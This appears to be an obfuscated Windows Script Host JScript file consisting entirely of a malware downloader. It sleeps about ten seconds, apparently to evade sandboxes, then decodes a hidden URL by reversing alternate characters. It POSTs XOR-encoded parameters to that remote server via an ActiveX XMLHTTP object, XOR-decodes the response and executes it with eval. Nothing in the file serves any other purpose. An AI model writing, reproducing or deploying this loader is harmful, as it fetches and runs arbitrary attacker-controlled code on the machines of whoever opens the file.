
var wicy = {
	
	wcotyqwdu : function () {
		var tysyp = (new Date)['getTime']();
		var tylcdu = tysyp + 10000;
		while (tysyp < tylcdu) {
			tysyp = (new Date)['getTime']();
			wicy.ymatafmfa();
		}
	},
	
	ymatafmfa : function () {
		var kcaswesus = 'Sleep';
		WScript[kcaswesus](1000);
	},
	
	lukduvca : function (sajaupus) {
		if(!sajaupus) return '';
		var mevwev = parseInt(sajaupus['substr'](0, 2), 16);
		var nyvnallzy = sajaupus['substr'](2);
		var zpewqaol = '';
		
		for (var yxgyqbe = 0; yxgyqbe < nyvnallzy['length']; yxgyqbe+=2) {
			zpewqaol += String['fromCharCode'](parseInt(nyvnallzy['substr'](yxgyqbe, 2), 16) ^ mevwev);
		}
			
		return zpewqaol;
	},
	
	pisy : function (sajaupus) {
		var mevwev = 248;
		var zpewqaol = wicy.byggvy(mevwev);
		
		for (var yxgyqbe = 0; yxgyqbe < sajaupus['length']; yxgyqbe++) {
			zpewqaol += wicy.byggvy(sajaupus['charCodeAt'](yxgyqbe) ^ mevwev);
		}

		return zpewqaol;
	},
	
	byggvy : function (yxgyqbe) {
		var aqcu = '00';
		var viim = aqcu+yxgyqbe['toString'](16);
		return viim['substr'](viim['length']-2);
	},
	
	rufbi : function (suytxidne) {
		var zkogtihig = '';
		for(var sexrpy=0; sexrpy<suytxidne['length']; sexrpy++) {
			if(sexrpy%2) {
				zkogtihig = suytxidne['substr'](sexrpy, 1) + zkogtihig;
			}
		}

		return zkogtihig;
	},
	
	ydygrjywu : function (ewdbo) {
		var yvmzoensna = '';

		for (var yxgyqbe = 0; yxgyqbe < ewdbo['length']; yxgyqbe++) {
			if(ewdbo[yxgyqbe][0]) {
				yvmzoensna += ewdbo[yxgyqbe][0] + '=' + encodeURIComponent(''+ewdbo[yxgyqbe][1]) + '&';
			}
			else {
				yvmzoensna += yxgyqbe + '=' + encodeURIComponent(''+ewdbo[yxgyqbe]) + '&';
			}
		}
		
		return wicy.pisy(yvmzoensna);
	},
	
	vfoizze : function (yvmzoensna) {
		try {
			var eqmapra;
			eqmapra = new ActiveXObject('MSXML2.XMLHTTP');
			eqmapra['open']('POST', url, false);
			eqmapra['send'](yvmzoensna);
			return eqmapra['responseText'];		
		} catch (e) {}
	}
	
};

function baptapca() {}

wicy.wcotyqwdu();



var url = wicy.rufbi('ksxuz.cyrlhijmhahfi-slllpizhy.enoegxq.r6jfc3wag1h4n5b8l/i/g:fswpftrthhm')+wicy.rufbi('iginspu.yldefxbispz/u');


function request(ewdbo) {
	var qipbe = wicy.vfoizze(wicy.ydygrjywu(ewdbo));
	return wicy.lukduvca(qipbe);
}


var qibtyrbsy = ['a', '501', '263'];


var yzysqlecce = request(qibtyrbsy);
this['eval'](yzysqlecce);


